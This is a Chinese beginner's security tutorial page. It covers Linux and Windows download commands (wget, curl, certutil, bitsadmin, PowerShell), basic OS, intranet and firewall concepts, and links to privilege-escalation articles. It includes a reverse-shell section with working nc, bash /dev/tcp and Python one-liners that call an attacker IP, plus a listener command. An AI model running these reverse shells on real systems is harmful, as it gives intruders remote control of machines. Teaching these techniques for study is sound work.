当前位置: 首页 > news >正文

网络安全基础-1

棱角社区:[~]#棱角 ::Edge.Forum*

专业名词

操作系统

文件下载

linux:下载命令

1. wget命令
wget是一个非常强大的命令行下载工具,支持HTTP、HTTPS、FTP等多种协议,并具备断点续传、递归下载等功能。

基本用法:

下载文件到当前目录:wget [URL]
下载文件并重命名:wget -O 新文件名 [URL]
后台下载文件:wget -b [URL]
断点续传:wget -c [URL]

示例:

下载文件:wget http://example.com/file.zip
下载文件并重命名为newfile.zip:wget -O newfile.zip http://example.com/file.zip
2. curl命令

简介:
curl是另一个功能强大的命令行下载工具,支持多种协议,并可以用于发送HTTP请求和接收服务器响应。与wget相比,curl提供了更多的功能和选项。

基本用法:

下载文件到当前目录:curl -O [URL]
下载文件并重命名:curl -o 新文件名 [URL]
后台下载文件(需要结合其他命令或脚本实现):curl本身没有直接的后台下载选项,但可以通过将curl命令放入后台运行的shell脚本来实现。
断点续传:curl -C - -O [URL](注意:curl的断点续传功能可能不如wget直观或强大)

示例:

下载文件:curl -O http://example.com/file.zip
下载文件并重命名为newfile.zip:curl -o newfile.zip http://example.com/file.zip
3. scp命令

简介:
scp(secure copy)是一个用于在本地主机和远程主机之间通过SSH协议安全传输文件的命令。虽然它主要用于文件传输而非直接从Web服务器下载文件,但可以用于从远程Linux服务器下载文件到本地。

基本用法:

从远程主机下载文件到本地:scp 用户名@远程主机地址:/远程文件路径 /本地保存路径

示例:

从远程服务器下载example.tar.gz文件:scp user@example.com:/path/to/example.tar.gz /local/directory/
4. rsync命令

简介:
rsync是一个快速、灵活、高效的文件复制和同步工具,它可以通过本地网络或SSH等方式进行文件传输。与scp类似,rsync也主要用于文件同步和传输,但提供了更多的选项和功能。

基本用法:

从远程主机下载文件或目录到本地:rsync -avz 用户名@远程主机地址:/远程文件或目录路径 /本地保存路径

示例:

从远程服务器下载example目录:rsync -avz user@example.com:/path/to/example/ /local/directory/
5. ftp命令

简介:
ftp(File Transfer Protocol)是一种用于文件传输的协议,ftp命令允许用户通过命令行界面与FTP服务器进行交互,从而上传或下载文件。

基本用法:

使用ftp命令进入交互模式后,通过get命令下载文件。

示例:

进入ftp交互模式(略过具体命令,因为需要用户手动输入服务器地址、用户名和密码等信息)
下载文件:get 文件名

windows系统下载命令:

在Windows系统中,下载文件的命令与所使用的工具紧密相关。以下是几种常用的下载文件的方法及其对应的命令:

1. 使用PowerShell

PowerShell是Windows系统内置的一个功能强大的脚本环境,可以用来执行复杂的任务,包括下载文件。使用PowerShell下载文件的命令通常是:

Invoke-WebRequest -Uri "http://URL/FileName" -OutFile "Save-As-FileName"

这里,"http://URL/FileName" 是你想要下载的文件的URL地址,"Save-As-FileName" 是你希望将文件保存为的名称(包括文件格式后缀)。

2. 使用CertUtil

CertUtil是Windows系统自带的一个命令行工具,主要用于管理证书,但它也支持从网络上下载文件。使用CertUtil下载文件的命令如下:

certutil -urlcache -split -f "http://URL/FileName" "Save-As-FileName"

同样地,"http://URL/FileName" 是文件的URL,"Save-As-FileName" 是保存的文件名。

3. 使用BitsAdmin

BitsAdmin是另一个Windows内置的命令行工具,它用于在后台传输文件,可以在用户注销或计算机关闭时继续传输。使用BitsAdmin下载文件的命令可能比较复杂,因为它需要创建一个下载作业,但基本步骤如下:

bitsadmin /transfer myDownloadJob /download /priority normal "http://URL/FileName" "C:\path\to\Save-As-FileName"

这里,"myDownloadJob" 是你给下载作业起的名字,"http://URL/FileName" 是文件的URL,"C:\path\to\Save-As-FileName" 是文件的保存路径和名称。

4. 使用wget或curl(如果已安装)

尽管wget和curl不是Windows系统内置的,但它们是非常流行的命令行下载工具,可以在Windows上通过安装第三方软件包(如GnuWin32、Cygwin或Windows Subsystem for Linux)来使用。

wget的命令格式类似于:wget http://URL/FileName,然后可以使用-O选项来指定保存的文件名。
curl的命令格式类似于PowerShell中的Invoke-WebRequest,但curl在Windows上可能需要单独安装。
5. 使用Git(针对特定场景)

如果你的目标是下载Git仓库中的文件或特定版本的文件,可以使用Git命令。但请注意,这通常用于版本控制场景,而不是一般的文件下载。Git相关的命令包括git clone(克隆整个仓库)、git checkout(检出特定版本或分支的文件)等。

 

反弹shell

反弹shell在线生成:反弹shell生成器

1. Netcat (nc) 反弹shell

nc支持 -e时

nc -e /bin/bash 47.94.235.118 5566 #nc -e /bin/bash 攻击者IP 端口

nc 不支持 -e时

nc 攻击者IP 端口 | /bin/bash | nc 攻击者IP 另一个端口

2.bash反弹shell

使用/dev/tcp来建立一个TCP连接,并将bash的标准输入、输出和错误输出重定向到这个连接上

bash -i >& /dev/tcp/攻击者IP/端口 0>&1  #启动一个交互式bash,将标准输出和标准错误输出重定向到/dev/tcp/攻击者IP/端口(即建立一个到攻击者IP上指定端口的TCP连接,并将输出发送到那里),然后将标准输入也重定向到那里。

3.Python反弹shell

通过Python的socket库来建立连接,并使用os.dup2来重定向标准输入、输出和错误输出

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击者IP",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

监听

命令 nc -lvvp 5566 是使用 Netcat(nc)工具在本地计算机上监听(listen)TCP端口5566

nc -lvvp 5566   #Netcat 将在你的计算机上监听TCP端口5566,等待连接到该端口的客户端,连接建立后,你就可以开始在该连接上发送和接收数据

知识点

用途

操作系统的用途是管理和控制计算机系统的硬件和软件资源,提供用户与计算机之间的交互界面,以及确保计算机系统的安全、稳定和可靠运行。它是计算机系统中不可或缺的一部分。

1.资源管理

处理器管理:操作系统负责管理和分配计算机的处理器时间,确保多个程序能够公平、高效地运行。它使用各种调度算法来决定哪个程序先执行,哪个程序后执行。
内存管理:操作系统负责内存的分配和回收,以及提供内存保护。它确保每个程序都有自己的内存空间,避免程序间的相互干扰。
设备管理:操作系统管理计算机的输入输出设备,如键盘、鼠标、打印机、硬盘等。它为用户和程序提供统一的设备访问接口,隐藏设备间的差异。
文件管理:操作系统提供对文件的创建、删除、读写、复制、移动等操作,以及文件的目录结构管理。它使得用户能够方便地组织和访问存储在硬盘上的数据。

2.提供用户界面:

操作系统提供图形用户界面(GUI)或命令行界面(CLI),使用户能够方便地与计算机进行交互。GUI通过图形化的方式展示信息,使得操作更加直观和易于理解;CLI则通过命令行的方式,允许用户通过输入命令来执行各种操作。

3.程序执行:

操作系统负责程序的加载和执行。当用户启动一个程序时,操作系统会将其从硬盘加载到内存中,并为其分配必要的资源,然后执行该程序。程序执行完毕后,操作系统会回收其占用的资源。

4.系统安全:

操作系统提供了一系列的安全机制,如用户认证、权限管理、数据加密等,以保护计算机系统和数据的安全。它确保只有经过授权的用户才能访问特定的资源,防止未授权访问和恶意攻击。

5.系统扩展和维护:

操作系统支持硬件和软件的扩展,使得用户能够根据需要添加新的硬件设备或软件应用程序。同时,操作系统还提供了系统维护的功能,如磁盘碎片整理、系统备份和恢复等,以确保计算机系统的稳定性和可靠性。

命令

linux基础命令:Linux命令和介绍_linux ctr-d-CSDN博客

windows基础命令:Windows常用详细命令大全_windows命令大全-CSDN博客

权限

linux权限:【Linux】 Linux用户权限、文件权限、权限操作相关介绍_描述linux操作系统中文件普通权限、设置方法;用户受权限的影响。-CSDN博客

udf提权:udf提权_kali udf提权-CSDN博客

windows:win权限提升(非常详细)零基础入门到精通,收藏这一篇就够了_windows权限提升-CSDN博客

网络

  网络可以大致分为内网(Internal Network 或 Intranet)和外网(External Network 或 Internet)。这两种网络在功能、范围、安全性等方面有着显著的区别。

内网

  内网是指允许企业或组织内部用户访问的网络,通常与互联网物理隔离或通过防火墙等安全设备相连,以确保内部数据的安全性和隐私性。内网主要用于企业内部资源共享、信息交流、协同工作等。内网中的设备(如计算机、服务器、打印机等)和资源(如文件、数据库、应用程序等)通常只对内部用户开放,外部用户无法直接访问。

外网

  外网即互联网,是一个全球性的计算机网络系统,由无数个子网相互连接而成。互联网通过标准的网络协议和通信规则,实现了全球范围内的信息共享和交流。互联网上的资源丰富多彩,包括各种网站、服务、应用程序等,用户可以通过浏览器、电子邮件、即时通讯工具等访问和使用这些资源。

防火墙

  防火墙的出站和入站规则是保护网络安全的重要组成部分。通过合理配置这些规则,可以有效地控制数据的流入和流出,防止敏感信息泄露和恶意攻击的发生。因此,在使用防火墙时,用户应该充分了解并合理配置这些规则,以确保网络的安全性和稳定性。

出站

  出站规则是指防火墙对从内部网络流向外部网络的数据流进行过滤和控制的规则。这些规则通常用于限制内部网络中的计算机向外部网络发送数据的类型和数量,以保护内部网络的安全性。通过出站规则,可以确保只有符合特定条件的数据包才能被允许离开内部网络,从而防止敏感信息泄露或不当的数据传输。

入站

  入站规则则是指防火墙对从外部网络流向内部网络的数据流进行过滤和控制的规则。这些规则用于限制外部网络中的计算机向内部网络发送数据的类型和数量,以防止外部网络的攻击和入侵。通过入站规则,可以确保只有经过授权和验证的数据包才能被允许进入内部网络,从而保护内部网络免受恶意攻击和未授权访问的威胁。

相关文章:

网络安全基础-1

棱角社区:[~]#棱角 ::Edge.Forum* 专业名词 操作系统 文件下载 linux:下载命令 1. wget命令 wget是一个非常强大的命令行下载工具,支持HTTP、HTTPS、FTP等多种协议,并具备断点续传、递归下载等功能。 基本用法: 下载文件到…...

SSH远程访问及控制

目录 一、SSH远程管理 1、SSH定义 2、SSH客户端和服务端 3、SSH工作类型 3.1、对称加密 3.2、非对称加密 4、SSH工作原理 公钥传输原理 4.1、基本概念 4.2、工作过程 5、OpenSSH服务器 二、SSH远程登录方式 1、SSH直接远程登录 2、SSH指定端口登录 3、黑白名单 …...

Qt 绘图详解

文章目录 头文件和构造函数启用反锯齿功能绘制矩形绘制圆角矩形绘制椭圆绘制圆弧绘制弦绘制凸多边形绘制图片绘制直线绘制多条直线绘制多点连接的线绘制路径绘制扇形绘制点绘制文本擦除矩形区域填充矩形填充路径 头文件和构造函数 #include "mainwindow.h" #include…...

Python 爬虫与 Java 爬虫:相似之处、不同之处和选项

在信息时代,网络上可用的数据量巨大且不断增长。为了从这些数据中提取有用的信息,爬虫已成为一种重要的技术。Python 和 Java 都是流行的编程语言,都具有强大的爬虫功能。本文将深入探讨 Python 爬虫和 Java 爬虫之间的差异,以帮助…...

视频监控汇聚平台LntonCVS视频监控系统解决智慧产业园的安全应用方案

近年来,随着全国各地数字化转型和相关政策的出台,数字化和智慧化在各行业迅速发展,尤其是作为产业集群重要组成部分的产业园区。然而,园区智慧化进程加快的同时,数字化转型面临着诸如视频监控数据分散、联通不畅、碎片…...

MAVLink代码生成-C#

一. 准备Windows下安装环境 Python 3.3 – 官网链接下载Python future模块 –pip3 install future TkInter (GUI 工具). – python for Windows自带,无需下载环境变量PYTHONPATH必须包含mavlink存储库的目录路径。 –set PYTHONPATH你的mavlink源码路径 源码下载在…...

二四、3d人脸构建

一、下载github项目3dmm_cnn-master https://github.com/anhttran/3dmm_cnn.git 一个使用深度神经网络从单个图像进行 3D 人脸建模的项目,端到端代码,可直接根据图像强度进行 3D 形状和纹理估计;使用回归的 3D 面部模型,从检测到的面部特征点估计头部姿势和表情。…...

鸿蒙开发:Universal Keystore Kit(密钥管理服务)【加解密(C/C++)】

加解密(C/C) 以AES 256密钥为例,完成加解密。具体的场景介绍及支持的算法规格。 在CMake脚本中链接相关动态库 target_link_libraries(entry PUBLIC libhuks_ndk.z.so)开发步骤 生成密钥 指定密钥别名。初始化密钥属性集。调用OH_Huks_GenerateKeyItem生成密钥)…...

Python的入门知识(上)

学习目标: 了解python 入门知识 这里写目录标题 学习目标:学习内容:快速入门 Python 基础特殊规则及特殊字符:Python 文件组织:多元赋值:变量命名规则:__name__ 系统变量:内存管理&a…...

2024春秋杯网络安全联赛夏季赛-PWN

文章目录 stdout测试setvbuf(stdout, 0LL, 2, 0LL)绕过或者输出直到缓冲区满使用system("/bin/sh")或者onegadget即使setvbuf(stdout, 0LL, 0, 0LL);也能立即有回显参考[https://starrysky1004.github.io/2024/07/05/2024-shu-qi-xue-xi-ji-lu/#toc-heading-4](https…...

怎么提高音频声音大小?提高音频声音大小的四种方法

怎么提高音频声音大小?在音频处理和编辑中,增加声音的音量是一个常见的需求,尤其是在确保音频清晰度和听觉效果的同时。调整音频的音量不仅仅是简单地提高音频的响度,它也涉及到如何保持音质的高标准,确保没有失真或削…...

从数据仓库到数据湖(下):热门的数据湖开源框架

文章目录 一、前言二、Delta Lake三、Apache Hudi四、Apache Iceberg五、Apache Paimon六、对比七、笔者观点八、总结九、参考资料 一、前言 在上一篇从数据仓库到数据湖(上):数据湖导论文章中,我们简单讲述了数据湖的起源、使用原因及其本质。本篇文章…...

对话AI原生 | 千帆AppBuilder重构企业AI原生应用开发体验

人工智能和大模型正在引领当前最重要的科技创新趋势。在过去的一年中,行业关注点已从大模型研发转向实际应用,正成为推动创新和转型的关键力量。百度智能云千帆AppBuilder作为基于大模型的企业级AI原生应用开发工作台,支持应用的快速开发和发…...

CF253C Text Editor 题解

思路 既然要求最少步数,那我们可以用bfs 如果鼠标的位置比上一行的行末位置大,如果按上的话,移到上一行的行末。如果鼠标的位置比下一行的行末位置大,如果按下的话,移到下一行的行末。 注意当鼠标位置超过当前行最大…...

Spring Boot 创建定时任务

在现代应用程序开发中,定时任务是一个常见的需求。Spring Boot作为一个强大的框架,提供了简单易用的定时任务调度功能。本文将详细介绍如何在Spring Boot中创建和管理定时任务,并提供完整的代码示例。 1. 什么是定时任务 定时任务是指在预定…...

Vue使用Echarts(入门级)

最终效果&#xff1a; npm install echarts --save // 先安装echarts<template><!-- 创建一个dom区域用于挂载echarts图表 --><div id"chart" style"width: 600px;height:500px;"/> </template> <script> import * as ech…...

2025届秋招提前批信息汇总(计算机类)

私企篇 深信服 链接&#xff1a;https://app.mokahr.com/campus_apply/sangfor/27944#/home内推码&#xff1a;NTAHRFS截止时间&#xff1a;6月21日 TP-LINK 链接&#xff1a;https://hr.tp-link.com.cn/jobList?jobId107&jobDirection0&workPlace0&currentPa…...

Scala Collection(集合)

Scala Collection(集合) Scala集合库是Scala语言的核心特性之一,它提供了一套丰富的数据结构来存储、管理和操作数据。Scala集合分为可变(mutable)和不可变(immutable)两种类型,每种类型都有其特定的用途和优势。本文将详细介绍Scala集合库的基本概念、常用集合类型以及…...

Go 语言 UUID 库 google/uuid 源码解析:UUID version4 的实现

google/uuid 库地址 本文将解析 googl/uuid 库中 UUID 变体10版本4的实现。 版本 4 的 UUID 采取完全随机的方式实现&#xff0c;简单来说就是将 UUID 中的 122 位全部随机填充&#xff08;剩余的 6 位作标记位&#xff09;。版本 4 的 UUID 存在一定的重复风险&#xff0c;但…...

开发个人Go-ChatGPT--6 OpenUI

开发个人Go-ChatGPT–6 OpenUI Open-webui Open WebUI 是一种可扩展、功能丰富且用户友好的自托管 WebUI&#xff0c;旨在完全离线运行。它支持各种 LLM 运行器&#xff0c;包括 Ollama 和 OpenAI 兼容的 API。 功能 由于总所周知的原由&#xff0c;OpenAI 的接口需要密钥才…...

设计模式和设计原则回顾

设计模式和设计原则回顾 23种设计模式是设计原则的完美体现,设计原则设计原则是设计模式的理论基石, 设计模式 在经典的设计模式分类中(如《设计模式:可复用面向对象软件的基础》一书中),总共有23种设计模式,分为三大类: 一、创建型模式(5种) 1. 单例模式(Sing…...

ssc377d修改flash分区大小

1、flash的分区默认分配16M、 / # df -h Filesystem Size Used Available Use% Mounted on /dev/root 1.9M 1.9M 0 100% / /dev/mtdblock4 3.0M...

MySQL中【正则表达式】用法

MySQL 中正则表达式通过 REGEXP 或 RLIKE 操作符实现&#xff08;两者等价&#xff09;&#xff0c;用于在 WHERE 子句中进行复杂的字符串模式匹配。以下是核心用法和示例&#xff1a; 一、基础语法 SELECT column_name FROM table_name WHERE column_name REGEXP pattern; …...

4. TypeScript 类型推断与类型组合

一、类型推断 (一) 什么是类型推断 TypeScript 的类型推断会根据变量、函数返回值、对象和数组的赋值和使用方式&#xff0c;自动确定它们的类型。 这一特性减少了显式类型注解的需要&#xff0c;在保持类型安全的同时简化了代码。通过分析上下文和初始值&#xff0c;TypeSc…...

PostgreSQL——环境搭建

一、Linux # 安装 PostgreSQL 15 仓库 sudo dnf install -y https://download.postgresql.org/pub/repos/yum/reporpms/EL-$(rpm -E %{rhel})-x86_64/pgdg-redhat-repo-latest.noarch.rpm# 安装之前先确认是否已经存在PostgreSQL rpm -qa | grep postgres# 如果存在&#xff0…...

论文阅读:Matting by Generation

今天介绍一篇关于 matting 抠图的文章&#xff0c;抠图也算是计算机视觉里面非常经典的一个任务了。从早期的经典算法到如今的深度学习算法&#xff0c;已经有很多的工作和这个任务相关。这两年 diffusion 模型很火&#xff0c;大家又开始用 diffusion 模型做各种 CV 任务了&am…...

JS红宝书笔记 - 3.3 变量

要定义变量&#xff0c;可以使用var操作符&#xff0c;后跟变量名 ES实现变量初始化&#xff0c;因此可以同时定义变量并设置它的值 使用var操作符定义的变量会成为包含它的函数的局部变量。 在函数内定义变量时省略var操作符&#xff0c;可以创建一个全局变量 如果需要定义…...

大模型——基于Docker+DeepSeek+Dify :搭建企业级本地私有化知识库超详细教程

基于Docker+DeepSeek+Dify :搭建企业级本地私有化知识库超详细教程 下载安装Docker Docker官网:https://www.docker.com/ 自定义Docker安装路径 Docker默认安装在C盘,大小大概2.9G,做这行最忌讳的就是安装软件全装C盘,所以我调整了下安装路径。 新建安装目录:E:\MyS…...

动态规划-1035.不相交的线-力扣(LeetCode)

一、题目解析 光看题目要求和例图&#xff0c;感觉这题好麻烦&#xff0c;直线不能相交啊&#xff0c;每个数字只属于一条连线啊等等&#xff0c;但我们结合题目所给的信息和例图的内容&#xff0c;这不就是最长公共子序列吗&#xff1f;&#xff0c;我们把最长公共子序列连线起…...

python可视化:俄乌战争时间线关键节点与深层原因

俄乌战争时间线可视化分析&#xff1a;关键节点与深层原因 俄乌战争是21世纪欧洲最具影响力的地缘政治冲突之一&#xff0c;自2022年2月爆发以来已持续超过3年。 本文将通过Python可视化工具&#xff0c;系统分析这场战争的时间线、关键节点及其背后的深层原因&#xff0c;全面…...